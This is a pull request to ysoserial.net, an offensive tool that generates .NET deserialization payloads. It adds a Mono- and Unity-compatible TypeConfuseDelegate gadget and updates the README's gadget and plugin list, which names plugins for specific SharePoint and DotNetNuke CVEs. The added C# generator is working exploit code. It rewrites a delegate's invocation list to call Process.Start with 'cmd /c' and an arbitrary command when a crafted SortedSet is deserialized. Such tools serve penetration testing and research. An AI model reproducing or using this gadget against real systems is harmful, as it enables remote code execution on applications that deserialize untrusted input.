### PR TITLE
Added Mono compatible TypeConfuseDelegate generator

### DIFF
--- a/README.md
+++ b/README.md
@@ -27,6 +27,13 @@ $ ./ysoserial -h
 ysoserial.net generates deserialization payloads for a variety of .NET formatters.
 
 Available formatters:
+        ActivitySurrogateDisableTypeCheck (ActivitySurrogateDisableTypeCheck Gadget by Nick Landers. Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored.)
+                Formatters:
+                        BinaryFormatter
+                        ObjectStateFormatter
+                        SoapFormatter
+                        NetDataContractSerializer
+                        LosFormatter
         ActivitySurrogateSelectorFromFile (ActivitySurrogateSelector gadget by James Forshaw. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'.)
                 Formatters:
                         BinaryFormatter
@@ -48,7 +55,7 @@ Available formatters:
                         XmlSerializer
                         DataContractSerializer
                         YamlDotNet < 5.0.0
-        TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz.)
+        TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz)
                 Formatters:
                         BinaryFormatter
                         ObjectStateFormatter
@@ -68,23 +75,31 @@ Available formatters:
                         ObjectStateFormatter
                         NetDataContractSerializer
                         LosFormatter
+        TypeConfuseDelegateMono (TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono)
+                Formatters:
+                        BinaryFormatter
+                        ObjectStateFormatter
+                        NetDataContractSerializer
+                        LosFormatter
         WindowsIdentity (WindowsIdentity Gadget by Levi Broderick)
                 Formatters:
                         BinaryFormatter
                         Json.Net
                         DataContractSerializer
+                        SoapFormatter
 
 Available plugins:
-        altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
+        ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
+        Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
         ApplicationTrust (Generates XML payload for the ApplicationTrust class)
         Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps)
         DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822)
         Resx (Generates RESX files)
         SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class)
-        SharePoint (Generates poayloads for SharePoint CVEs: CVE-2019-0604, CVE-2018-8421)
+        SharePoint (Generates poayloads for the following SharePoint CVEs: CVE-2019-0604, CVE-2018-8421)
         TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method)
         ViewState (Generates a ViewState using known MachineKey parameters)
-        
+
 Usage: ysoserial.exe [options]
 Options:
   -p, --plugin=VALUE         the plugin to be used

--- a/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
+++ b/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
@@ -1,0 +1,57 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Reflection;
+
+namespace ysoserial.Generators
+{
+    class TypeConfuseDelegateMonoGenerator : GenericGenerator
+    {
+        public override string Name()
+        {
+            return "TypeConfuseDelegateMono";
+        }
+
+        public override string Description()
+        {
+            return "TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono";
+        }
+
+        public override List<string> SupportedFormatters()
+        {
+            return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "NetDataContractSerializer", "LosFormatter" };
+        }
+
+        public override object Generate(string cmd, string formatter, Boolean test)
+        {
+            return Serialize(TypeConfuseDelegateGadget(cmd), formatter, test);
+        }
+
+        /* this can be used easily by the plugins as well */
+        public object TypeConfuseDelegateGadget(string cmd)
+        {
+            if (File.Exists(cmd))
+            {
+                Console.Error.WriteLine("Reading command from file " + cmd + " ...");
+                cmd = File.ReadAllText(cmd);
+            }
+            Delegate da = new Comparison<string>(String.Compare);
+            Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
+            IComparer<string> comp = Comparer<string>.Create(d);
+            SortedSet<string> set = new SortedSet<string>(comp);
+            set.Add("cmd");
+            set.Add("/c " + cmd);
+
+            FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
+            object[] invoke_list = d.GetInvocationList();
+            // Modify the invocation list to add Process::Start(string, string)
+            invoke_list[0] = new Func<string, string, Process>(Process.Start);
+            invoke_list[1] = new Func<string, string, Process>(Process.Start);
+            fi.SetValue(d, invoke_list);
+
+            return set;
+        }
+
+    }
+}

--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -88,6 +88,7 @@
     <Compile Include="Generators\TextFormattingRunPropertiesGenerator.cs" />
     <Compile Include="Generators\PSObjectGenerator.cs" />
     <Compile Include="Generators\TypeConfuseDelegateGenerator.cs" />
+    <Compile Include="Generators\TypeConfuseDelegateMonoGenerator.cs" />
     <Compile Include="Generators\WindowsIdentityGenerator.cs" />
     <Compile Include="Plugins\ActivatorUrlPlugin.cs" />
     <Compile Include="Plugins\AltserializationPlugin.cs" />


### PR DESCRIPTION
The `TypeConfuseDelegate` technique for Mono, but requires a tweak to work correctly. This PR adds a new generator that contains the tweak, allowing ysoserial.net to be used again Mono (and Unity) targets. Details on where the standard `TypeConfuseDelegate` fails in Mono is available here: https://gist.github.com/denandz/aa2b7bd145c95b430cfc0386a9e6ce40